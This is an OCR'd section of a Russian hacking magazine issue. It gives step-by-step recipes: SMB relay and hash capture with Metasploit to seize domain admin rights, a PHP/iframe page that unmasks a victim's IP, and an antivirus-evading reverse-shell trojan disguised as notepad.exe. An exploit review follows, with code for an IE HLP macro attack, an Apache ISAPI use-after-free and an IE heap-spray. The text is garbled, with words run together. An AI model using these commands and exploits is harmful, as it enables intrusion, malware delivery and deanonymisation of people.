книги хакеры / журнал хакер / 136_Optimized

ЗАДАЧА: ПОЛУЧИТЬПРАВААДМИНИСТ- ¹ 3 РАТОРАДОМЕНА

РЕШЕНИЕ:

Админскиеправа— святаясвятыхиполучитьих— благоедело. Способов— масса, ноянапомнютебепарочкуклассических. Особенноприятното, чтоониестьв нашемлюбимомmetasploit’е.

1. smb relay.

Да, старыйдобрыйsmb relay. Этомувидуатакужебольше10 лет, авсеиз-за вкриптографическихпроблем, проблемвдизайнеNTLM-протокола, атакже

глубины, скоторойонвшитвОС. Каждыйгодисследователипридумываютсним что-тоновенькое.

Напомнютебе(есливдругтызапамятовал), чтоsmb relay — этоклассическая man-n-middle атака, т.е. хакерзаставляетсвоюжертвуаутентифицироватьсяна подконтрольномемухостеипересылаетэтуинформациюнасервер, которымхочет завладеть. Засчетданныхдействийхакерполучаетдоступксерверусправами жертвы.

Теперьпопорядку(см. скриншот):

1.Хакер(attacker) заставляетсвоюжертву(victim) подсоединитьсяксебе.

2.Хакерподключаетсяксерверу(target) иполучаетотнегослучайный8-байтовый запрос.

3.Хакерпередаетэтотзапросжертве.

4.Жертваотвечаетхакерухешемпароля.

5.Хакерпересылаетегонасервериполучаетдоступксерверусправамижертвы. Такжесуществуетвариация, когдасерверомявляетсясамажертва, ноданная возможностьбылапофиксенаMicrosoft 2 годаназад.

Какужебылосказано, вMetasploit’есуществуетмодуль, реализующийsmb relayатаку. Делаемэточерезweb-интерфейс:

1.Выбираем эксплойт Microsoft Windows SMB Relay Code Execution.

2.Выбираем payload. Например, generic/shell_bind_tcp.

3.Выставляем LPORT, то есть куда будет коннектиться шелл после запуска.

4.Стартуем SMBHOST с ip-адресом сервера, к которому хотим получить доступ.

5.Запускаем эксплойт.

Теперь, когданашажертваподсоединитсякнашемуподдельномуsmb-серверу, всяинформациипоаутентификацииперенаправитсянаsmb-host имыполучим необходимыйдоступ.

2.Использоватьsmb sniffer.

Уsmb relay естьнебольшойнедостаток— онанесохраняетиспользуемыехеши, чтобыихможнобылопотомрасшифровать. Какраздляэтихцелей, чтобывитоге

Снифимхешивmetasploit’e

получитьпарольадмина, мыможемисполь-

зоватьмодульmetasploit’а— capture/smb.

Пример:

1. Подгружаем снифер:

msf > use auxiliary/server/ capture/smb

2. Запускаем его

msf auxiliary(smb) > run

Главноежеотличиеотsmb relay то, что вsmb-снифереиспользуетсяопреде- ленный«случайныйзапрос», аименно

1122334455667788, чтопозволяетвзло-

матьпарольнаосноверадужныхтаблиц. В smb relay жеонгенерируетсяслучайно. Остаетсяпоследнийвопрос, какжезаставитьжертвуподсоединитьсяктвоему серверу? Вседостаточнопросто. Из старыхметодов: требуетсялибопослать e-mail, либосгенерироватьhtml-стра- ничкусоссылкаминатвойресурстакого вида:

<img src="\\Attacker\SHARE\ file.jpg">

Когдаадминзайдетнанее, браузерзахочет автоматическиподгрузитьизображение, а дляэтогоемупридетсяаутентифицироваться натвоемсервере.

Изновенькогои, длябольшейскрытности, можноиспользоватьXSS уязвимости, коихразвелосьпредостаточновпоследнеевремя, илиатакипоDNS, ARP.

Еслизахочешьлучшеразобратьсявтеме, почитайsecuritylab.ru/contest/212100. phpиsecuritylab.ru/analytics/362448.php:

$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;

ВЗЛОМ

¹ 4 ЗАДАЧА: ОПРЕДЕЛИТЬКАКАЯCMS ИС-

ПОЛЬЗУЕТСЯНАСАЙТЕИТЕХНОЛОГИИ ЕЕРАЗРАБОТКИ.

РЕШЕНИЕ:Данныйвопросзадаетсяоченьчасто. Дляначаластоит вручнуюнаучитьсяопределятьхотябыосновныеcms. Способпрост: выискиваемстандартныесигнатурынасайтеи, используяGoogle, находим названиеcms вплотьдоверсии.

Искатьследуетвследующихместах:

1.Информация в html-ках сайта.

2.Поиск типичных путей к стилям и java-скриптам.

3.Ôàéë robots.txt.

4.Внешний вид ссылок.

5.Анализ http-заголовков и cookies.

7. Вид ошибочных страниц (ERROR404).

Но, руками-то— хорошо, далень-матушка, апотомуизавтоматизированныхсредствмогупосоветоватьтебеследующиесайты:

builtwith.com

webmastercoffee.com

2ip.ru

Онипокажуттебеcms, фрэймворки, языки, используемыена сайтесоссылкамии описаниями. Быстро ипросто, ночастенько ошибаются, потому лучшеиспользовать всевместе. Существуеттакже

аддонWappalyzer Алгоритмопределенияcms вWappalyzer кfirefox’у. Выводит

чутьменьшеинформации, затоболееточно, таккакбазаобновляется достаточночасто.

Хотяалгоритмунихслабенькийискрытьсяотнегонесоставляеттруда. МожешьувидетьэтонапримереWappalyzer. Дляэтогонужно:

1.Скачать Wappalyzer.

2.Переименовать в zip и разархивировать.

3.Посмотреть файл «\chrome\content\overlay.js».

¹ 5 ЗАДАЧА: ОПРЕДЕЛИТЬIP-АДРЕС

ЧЕЛОВЕКА.

РЕШЕНИЕ:

Оченьчастопоявляетсянеобходимостьвычислитького-товИнтернете.Сде- лаеттебекто-тогадость—иоченьхочетсяегонайти.Ноэтоипросто,итрудно одновременно.Технологииtcp/ipиинтернетпредоставляютмножество возможностейдляанонимногосерфинга,потомумногоезависитотуровня пользователя,которогонадовычислить.Еслитебевычислятьникогоненадо, тоэтаинформациябудетполезнадлясохранениятвоейанонимности. Ограничимзадачуиусловимся,чтотребуетсяопределитьIPпользователя, которыйиспользуетпроксии/илинаходитсязаNAT.Технологиятакова. Используясоциальнуюинженериюили,например,XSSдыркувкаком-нибудь сайте,мыподкидываемнашейжертвелинкна«наш»сервер.Жертвананего переходитимыполучаемееIP.Причем«нашим»серверомможетбыть,к примеру,тотжесерверсXSS-дыркой,приопределенныхусловиях.

Ты,наверное,ужемногочиталстатейотом,какполучатьPHP-заголовки отзапросапользователяи,анализируяих,узнатьIPпользователя.Ноэто всевозможно,толькоеслипроксинеанонимныйичеловекнаходитсянеза NAT’ом.Иначе—мывобломе.Чтожеделать?

Естьрешение!ИопятьнампоможетMetasploit. Аеслибытьточнее,тоихпроектDecloak:DeAnoynmized.

Итак,все,чтонамтеперьтребуется—этонайтихостингсподдержкойphp(или аналогичногоязыка)исоздатьскриптпримернотакоговида:

<?php $id=md5("blablabla" . $_SERVER['REMOTE_ADDR'] . $_SERVER[‘REMOTE_PORT’] . time() . " blablabla ");

Примерлогасhttp://decloak.net/report.html

$log= $id."-".$_SERVER['REMOTE_ADDR']."\r\n"; $fp=fopen("iplog.txt","a");//создаем файл на хостинге fputs($fp, $log); //заполняем его

fclose($fp); ?>

<html><head><meta http-equiv="Content-Type" content="text/ html; charset=utf-8" />

<title>Ìîå ôîòî</title></head><body>

<p><img src="001.gif" width=»200» height="153" /></p> <iframe src=»http://decloak.net/decloak.html?cid=<?php echo $id; ?>&word=0&itunes=0&quicktime=0" width="0" height="0" scrolling="no"></iframe> </body></html>

Витоге,жертва,заходянаданнуюстраницы,будетвидетьпоставленный тобойрисунок,абраузервскрытомфрэймепередастнеобходимуюинформациюнаdecloak.net/decloak.html.IPжертвытысможешьполучитьзайдяна

decloak.net/report.html?cid=<unicid>&format=text

Где<unicid>—этоуникальный32байтныйidдляидентификациизапроса. Еготыможешьвзятьизфайлаiplog.txt,которыйлогируетсяскриптомввиде:

d50712b92c93b98d063735612a6b78ea-127.0.0.1 уникальный id — IP жертвы, при коннекте &word=0&itunes=0&quicktime=0

Даннаястрокавзапросеограничиваетнекоторыетехнологии,используемые decloak’омдляопределенияIP-адреса,нокоторыеизбавляютотпалевав видезапросанаскачкуфайлаилиокошкаобустановкеплагина. ЕслитебетребуетсяразовоузнатьIP,например,черезXSS,тонадозапихнуть науязвимыйсайттолько,подставив32-байтныйнаборсимволовизголовы:

<iframe src=http://decloak.net/decloak.html?cid=<unicid>&word=0& itunes=0&quicktime=0 width=0 height=0 scrolling=no></iframe>

АпотомручкамивытащитьинфуподанномуID. Чтобынашскриптбылболеенеприметным,стоитзаменитьегорасширение наjpeg,например,ав.htaccessнасерверевыставитьдирективы,чтобыjpegфайлывоспринималиськакphp.

AddHandler application/x-httpd-php .jpeg

Кстатилюдям,пользующимсяTor-ом,можнонебеспокоитьсяоподдержа- ниисвойанонимностивсети—пристандартныхнастройкахиспользуемые методынесмогутобнаружитьвашнастоящийIP-адрес.

Описаниеиспользуемыхтехнологий,атакжепримерыреализации,если захочешьсделатьполностьюсвойдеанонимайзер,можешьпочитатьна decloak.net.

ЗАДАЧА: СОЗДАТЬТРОЯН, КОТОРЫЙНЕ ¹ 6 ОБНАРУЖИВАЕТСЯАНТИВИРУСАМИ.

РЕШЕНИЕ:

Затроянитького-нибудь— делохорошееинужное. Нооченьчастоантивирусы мешают. Старые, проверенныесредстважесткопалятся.

Путейрешенияэтопроблемынесколько.

1.Взятьстарыйтроянивоспользоватьсякаким-нибудькриптором. Ноанти- вирусныеконторыследятзапоявлениемпаблик-крипторов, потомувыжатьиз этогоможнонемного.

2.Взятьисходникчужоготроянаиизменитьего.

3.Написатьсвойтроян, какговорится, «снуля». Этопутьдолгийитернистый, но дастпочти100% результат.

4.Чтобынеперетруждатьсебяизанятьсядругимиполезнымиделами, воспользуемсяследующимметодом. НампотребуетсяMetasploit.

УMetasploit’аестьоднаприятнаявозможность: использоватьегонеполностью, атолькокакие-тоегочасти. Что, кпримеру, позволяетиспользоватьшелл-коды Metasploit’асэксплойтами, которыхвнемнет.

msfpayload windows/shell/reverse_tcp LHOST=192.168.146.128,L PORT=5555 X > reverse.exe

Здесь, незапускаяmfsconsole, мысразуизконсолиобращаемсякмодулю

Metasploit’асpayload’ами.

Исоздаемexe-шниксшеллом, которыйпослезапускаподконнектитсяна5555 портхостас192.168.146.128. “X” — указываетмодулю, чтонавыходедолженбыть полученexe-файл. Такжеподдерживаются:

C — код на языке СИ P - код на Perl

J - êîä íà JavaScript V - êîä íà VBA

y - код на Ruby R — машинный код

Троянготов. Создаемсервер,кудабудетконнектитьсянашшелл. Дляэтогопишем:

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_ tcp LHOST=192.168.146.128 LPORT=5555 E

Гдеmsfcli — интерфейскоманднойстрокиMetasploit’а.

Теперь,послезапускаreverse.exeжертвой,егокомпподключитсякнамна5555 и мыполучимконсольныйдоступсправамижертвы.Всебыхорошо,носигнатуры большинствастандартныхpayload’овMetasploit’аестьпочтивовсехантивирусах. Ихнедобавил, наверное, толькосамыйленивый. Потомуreverse.exeопределяется аж21антивиремиз41, чтопоказываеттестсvirustotal.com(см.скриншот).Чтоже делать? ВоспользоватьсяещеодниммодулемMetasploit’а—msfencode.Еслипо- простому, тоонизменяетразнымиспособамикодшелловиэксплойтов, чтобыте необнаруживалисьантивирусами, чтобызатруднитьреверс-инжиниринг.

Длянашейзадачиотличноподходит. Пишем:

msfpayload windows/shell/reverse_tcp LHOST=192.168.146.128,L

Тестированиеreverse.exe. Обнаружен21 антивирусамииз41

PORT=5555 R | msfencode -c 5 - e x86/shikata_ga_nai -x notepad. exe -t exe > reverspad.exe

Здесьмодульmsfpayload используетсяаналогичнымобразом, ноитоговый формат— машинныйкод, которыйможетвосприниматьmsfencode. Параметры:

-c5-ex86/shikata_ga_nai—(5раз)мызакодируемнашшеллметодомshikata_ga_nai: -x notepad.exe — msfencode совместитнашшелл-кодскакой-либодругой программкой. Дляпримера, незабудькинутьnotepad.exe впапку, изкоторой запускаешькоманды.

-t — задаетвыходнойформат, т.е. executable.

Совмещениефайловпроисходитследующимобразом. Msfencode — читает PE-заголовокфайла, ккоторомумыприкрепляемнашкод, находит.text секцию идобавляетвнеенашкод. Затемменяетвходнойадресдляexe-шника, потому сначалазапускаетсякод.

Витогемыполучаемследующиебонусы. Во-первых, рабочийшелл-код, во-вто- рых, полученныйreverspad.exe будетточь-в-точьпохожнаnotepad.exe. Тоесть ярлычок, информацияопроизводителеиразмердобайтабудутодинаковыми. Разницабудетзаметнатолькоеслипосмотретьхешфайла. И, самоеглавное, большинствоантивирусовнесмогуттеперьопределитьнаштроян. Еслиточнее, тоreverspad.exe определяетсякаквирьтолькодвумяантивирусами(см. скриншот). Иэтотольконачало, еслипомучитьmsfencode, томожнополучитьикуда лучшиерезультаты. z

Тестированиеreverspad.exe. Обнаружен2 антивирусамииз41.

ОБЗОР ЭКСПЛОИТОВ

01ВЫПОЛНЕНИЕПРОИЗВОЛЬНОГОКОДА ВБРАУЗЕРЕINTERNET EXPLORER

TARGETS

•Internet Explorer 7/8

•Windows XP

•Windows 2000/2003

BRIEF

ДостаточнозабавнаяуязвимостьбылаобнаруженаМаурицием Продеусом(Maurycy Prodeus), эксплуатированиекоторойприводитк выполнениюпроизвольногокодачерезбраузерInternet Explorer. Суть еесводитсяктому, чтоиспользуяфункциюMsgBox(), прииспользованииVisual Basic-скрипта, можноуказать вкачествепараметраэтой функциипутькактивному.hlp-файлу. Этотфайлбудетоткрыт, еслинажатьклавишу<F1> вмоментработыMsgBox(). Самфайлможетприэтом находиться, например, нашареиливдиректорииWebDAV. Выполнение кодапроисходитпотому, чтовэтомсамом.hlp файлемогутсодержаться макросы, напримерExecFile().

EXPLOIT

Эксплуатироватьуязвимостьможно, используясоответствующиймодуль метасплойта. Втакомвариантешеллкодсоберетсявисполняемыйфайл, изапуститсясредствамиHLP макросапринажатии<F1>. Единственный минус— таккакполучившейсябинарныйфайлнеявляетсядоверенным, тоестьподписанным, топосленажатияклавишипользовательувидит недружелюбноеокносвопросомнатему, чтосейчас, мол, какой-тоис- полняемыйфайлзапускатьсявздумал, несоизволители разрешить/запретитьэтобезобразие. Чтобыопробоватьсиечудо, достаточнонайтив метасплойтемодульie_winhlp32. Выбираянастройки, нужноучесть, что данныймодульбудетработатьтолькона80 порту, апутьURIPATH должен

ROP вделе.

быть«/». Впротивномслучаеэксплойтбудетругаться. Всехорошо, но вотэтоокноспредупреждениемонедоверенномисполняемомфайле портитвсюмалину. Немногопораскинувмозгами, япридумалспособ, какубратьэтоокошко. Мояидеязаключаетсявтом, чтоокошкоисчезнет, еслимакросвHLP-файленебудетсразузапускатьEXE, асначалабудет подключенсетевойресурскаксетевойдиск. Дляэтогопридетсясоздать свойHLP-файл. НампонадобитсяMicrosoft Help Workshop версии

4 (естьнадиске). ДлясозданияHLP-файлапервоначальнонужно создатьRTF-файл, напримервWord’e. Внегонужнодобавитьсноски (ВставкаÆСсылка->Сноска). Символсноскиимеетсамоенепосредственноезначение. Создайсноски: ‘$ ZLO’, ‘# IDH_1’ — заголовоки

МОЖНОЕЩЕЛУЧШЕ– ВЫКОВЫРЯТЬКЛАВИШУИРАЗДАТЬТАКУЮКЛАВИАТУРУСОТРУДНИКАМ. ОТЛИЧНЫЙ ПАТЧБУДЕТ

F1 – помощьвполучениишелла

идетимямакросаспараметрами. Допустим, мысоздалисетевойресурс free, инашIP — 10.10.10.10. Тогдадобавимтакиесноски:

!ExecFile(cmd,/c net use z: \\\\10.10.10.10\\free)

!ExecFile(cmd,/c wscript z:\\exec.vbs)

Такимобразом, эксплойтсначалаподключитсетевойдиск, апотомбез всякихвопросовзапуститскриптexec.vbs. Содержимоеexec.vbs:

Dim WshShell,oExec

Set WshShell = wscript.createobject("wscript.shell") Set oExec = WshShell.Exec("z:\zlo.exe")

Данныйскриптзапускаетисполняемыйфайл. Нозачемнуженскрипт, когдаможносразузапуститьфайл? Еслишеллкодметасплойтапеределатьвисполняемыйфайл, изапуститьсредствамимакроса, тоон неотдаступравлениеконсоли, ивитогепользовательпослезагрузки шеллкодаувидитчерноеокошкоcmd.exe, котороебудетвисеть, покапроцесснебудетзакрыт. Еслизапускатьчерезскрипт, тотогда wscript недаст«захватить» консоль, создавдляшеллкодасвойпроцесс, ивсечтоувидитпользователь, есливообщезаметит— мигание cmd.exe. Теперь, собственноотом, какизшеллкодасделатьисполняемыйфайл. Оченьпросто— загружаемcygwin консольметасплойтаи выполняем:

msfpayload windows/shell_bind_tcp LPORT=4444 X > zlo.exe

ДлякомпиляцииHLP-файла, создаемпроектвMicrosoft Help Workshop, жмемкнопкуFile, добавляемнашRTF. ЗатемжмемкнопкуMap идобавляемзапись: IDH_1=1. Послеэтогожмемнаверхнейпанеликнопку Compile — витогедолженполучитьсяфайлсрасширением.hlp. Теперь создаемресурсfree, выкладываемтудаHLP, EXE иVBS файлы. Нуинаконец, самоеинтересное— телоэксплойта, предложенногоМаурицием:

<html>

<script type="text/vbscript">

big = "\\10.10.10.10\free\EXEC.HLP"

MsgBox "please press F1 to save the world", , "please save the world", big, 1

MsgBox "press F1 to close this annoying popup", ,"", big, 1

</script>

</html>

Еслипользовательнажмет<F1> вовремяпоявлениясообщенияо спасениимира, можносмелоподсоединятьсяна4444 портсцельюполученияшелла. Параметрbig указываетнанашHLP файл, аследующий параметр, единица, номерконтекста(помнишь, мыделалиIDH_1=1?).

SOLUTION

ОфициальноерешениеоткомпанииMicrosoft — ненажимайте<F1>. Крометого, предлагаетсяотключитьсистемупомощи:

echo Y | cacls "%windir%\winhlp32.exe" /E /P everyone:N

ВЗЛОМ

Метасплойтподсуетились, отличный0-day дляIE6/7.

НелишнимбудетустановитьдлязоныИнтернетповышенныйуровень безопасности. СделатьэтоможновнастройкахInternet Explorer (Сер- вис->Свойстваобозревателя->Безопасность->Интернет->Высокий).

02ИСПОЛЬЗОВАНИЕОСВОБОЖДЕННОЙ ПАМЯТИВМОДУЛЕAPACHE ISAPI_ MODULE

TARGETS

•Apache <= 2.2.14

•Windows XP

•Windows 2000/2003

BRIEF

Модульisapi известноговеб-сервераApache дляплатформыWindows служитдляиспользованиярасширений, написанныхподвеб-сервер IIS. Данныймодульподключенксерверупоумолчанию. Дляуспешнойэксплуатацииуязвимостинеобходимо, чтобыхотькакое-нибудь расширениебылоустановлено. Саморасширениепредставляетсобой специальнуюDLL-библиотеку, котораяможетнаходиться, например, в папкеcgi-bin. Вконфигеапачадолженбытьустановленсоответствую-

щийобработчикдляDLL файлов: "AddHandler isapi-handler .dll". Если целевойсерверобрабатываетISAPI-расширения, тоонможетбыть успешнозахвачен, таккаквэтоммодулеприсутствуетошибкаиспользованияпамятипослеосвобождения. Сутьвтом, чтоеслипослатьзапрос кISAPI-расширениюиоборватьсессию(RESET-пакетом), товыделеннаяподмодульпамятьосвободится, ноуказательнанеесохранится. Приповторномзапросе, модульisapi, увидев, чтоуказательунегоесть, перейдетпонему, несмотрянато, чтовпамятиподанномуадресуможет бытьчтоугодно.

EXPLOIT

Баг-хантер Брэт Жервазони (Brett Gervasoni), написал эксплойт, который реализует данную уязвимость. Эксплойт посылает POST-за- прос к ISAPI-расширению и тут же рвет сессию, затем немного ждет, дабы выделенная под расширение память могла освободиться, и шлет второй пакет к тому же расширению. Но второй пакет не простой, он с кучей больших псевдо-http-заголовков. В этих псевдозаголовках находится много буковок A (0x41 — INC ECX: семантический NOP) и шеллкод. Суть в том, что для этих заголовков нужна память, и вполне вероятно, что эти заголовки запишутся туда, где раньше располагалось расширение ISAPI. Это приведет к тому, что когда модуль попытается перейти по сохраненному адресу, то он попадет на шеллкод из псевдо-заголовков. Сложность эксплуатации в том, что для каждого расширения придется подбирать свой размер и количество псевдозаголовков, но эта задача решается методом грубой силы или, если есть доступ к расширению, дебаггером. В случае успеха, шеллкод создает текстовый файл sos.txt в директории апача.

Текстовый файл содержит одну строчку: "pwn-isapi". Разумеется, шеллкод можно заменить на более полезный. Разберем ключевые места кода эксплойта подробнее:

. . .

//входные параметры serverIP = string(argv[1]); isapiDLL = string(argv[2]);

//Готовим много буквок 'А' memset(accept, 'A', 170); memset(referer, 'A', 732); memset(cookie, 'A', 5375); memset(random, 'A', 7603); memset(postData, 'A', 23378); memset(footer, 'A', 298);

//Первый запрос к расширению

triggerVuln = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n" "User-Agent: AAAAAAAA\r\n"

"Pragma: no-cache\r\n" "Proxy-Connection: Keep-Alive\r\n" "Host: " + serverIP + "\r\n" "Content-Length: 40334\r\n\r\n" + string(footer);

//Второй запрос

payload = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n" "Accept: " + string(accept) + "\r\n"

. . .

"Proxy-Connection: Keep-Alive\r\n"

"Okytuasd: " + string(cookie) + string(shellcode) + "\r\n" //пошли псевдо-заголовки и шеллкод

"Asdasdasdasdasd: " + string(random) + string(shellcode) + "\r\n"

"Asdasda: " + string(random) + string(shellcode) + "\r\n"

"Sewrwefbui: " + string(random) + string(shellcode) + "\r\n"

"Qdfasdernu: " + string(random) + string(shellcode) + "\r\n"

"Cdffew-asdf: " + string(random) + string(shellcode) + "\r\n"

. . .

"Content-Length: 25054\r\n\r\n" + string(postData) + "CCCC" +

string(shellcode) + "BBBB" + string(footer); // конец запроса

. . .

//createConnection - устанавливает соединение

if (createConnection(serverIP, SERVER_PORT) == 1)

{

printf("- an error occurred connecting to the server\n");

return 1;

}

. . .

linger_data.l_onoff = 0; linger_data.l_linger = 0; //Так автор хочет сделать RESET

setsockopt(sock, SOL_SOCKET, SO_LINGER,

ISAPI exploit. Совершеннобезобидныйшеллкод

(char*)&linger_data, sizeof(linger_data)); setsockopt(sock, SOL_SOCKET, SO_DONTLINGER,

(char*)&linger_data, sizeof(linger_data));

. . .

sendTransmission(triggerVuln); //Шлем первый пакет

Sleep(2000); //Ждем 2 секунда, что бы Apache успел проглотить первый пакет

WSACancelBlockingCall(); //И отвечаем RESET пакетом

. . .

//Далее закрываем сокет, очищаем структуры, и по новой //организуем соединение

. . .

sendTransmission(payload); //Шлем второй POST запрос с псевдо-загловками и шеллкодом

Авторпредупреждает, чтоданныйэксплойтнебудетработатьсвиртуальноймашины, ипротивDEP. ЕслицельнаходитсяподзащитойDEP, то витогебудетпростойDoS.

SOLUTION

Установитьверсиювеб-сервера2.2.15. Конечно, еслинеиспользуются ISAPI-расширения, тобоятьсяэксплойтанестоит.

03ИСПОЛЬЗОВАНИЕОСВОБОЖДЕННОЙПАМЯТИВБРАУЗЕРЕINTERNET EXPLORER

BRIEF

Встречаем0day. Девятогомартапоявиласьновостьотом, чтозлостные нарушителиактивноэксплуатируютнеизвестнуюуязвимостьвбраузерахтипаIE 6/7. Ужечерезденьвколлекцииметасплойтапоявилсяэксплойт, которыйреализуетэтууязвимость. Сутьуязвимостискрывается вбиблиотекебраузераiepeers.dll, которая, каксталопоследнеевремя модно, неможетуследитьзауказателемнаобъект.

EXPLOIT

Эксплойтполностьюоснованна«реальныхсобытиях», тоестьна коде, которыйбылнайденпонаводкесотрудниковMcAfree, которыеспалиливсвоемблогедоменсайтараспространителязаразы www.topix21century.com. Кодбылдеобфусцированипереписанпод метасплойт. Чтохарактерно, патча, закрывающегобрешь, вмомент написанияэтихстрокнебыло(натоонои0day). Рассмотримключевые местаэксплойта:

<button id='trigg' onclick='attack();' style='display:none'></button>

<script language='javascript'> function attack()

{

heap_spray();

//Стандартный heap-spray, забиваем память шеллкодом var obj = document.createElement('body');

//Создаем любой элемент obj.addBehavior('#default#userData'); document.appendChild(obj);

//Добавляем созданный объект

//Уязвимость тут for (i=0; i<10; i++)

{ //сдвигаем указатель… obj.setAttribute('s',window); //…устанавливая несуществующие атрибуты

}

window.status+='';

//объект windows указывает на шеллкод из кучи

}

document.getElementById('trigg').onclick(); //начало

}

</script></body></html>

Деталисамойуязвимостинераспространяются, нокакможнопонять изкодаэксплойта, атакующийспособенподменитьуказательобъекта window, витогепоследующееобращениекнемувыйдетбоком.

SOLUTION

РешенияпроблемыдлявладельцевIE6/7 — DEP. Этоконечнонепанацея, ноотэтогоэксплойтаспасет. Крометого, лучшеперейтинапоследнюю версиюбраузера. Internet Explorer 8 неподверженданнойуязвимости. А такжеждемзаплаткиотMicrosoft, котораядолжназакрытьэтудыру.

04ПЕРЕПОЛНЕНИЕБУФЕРАВLIBTIFF ACROBAT READER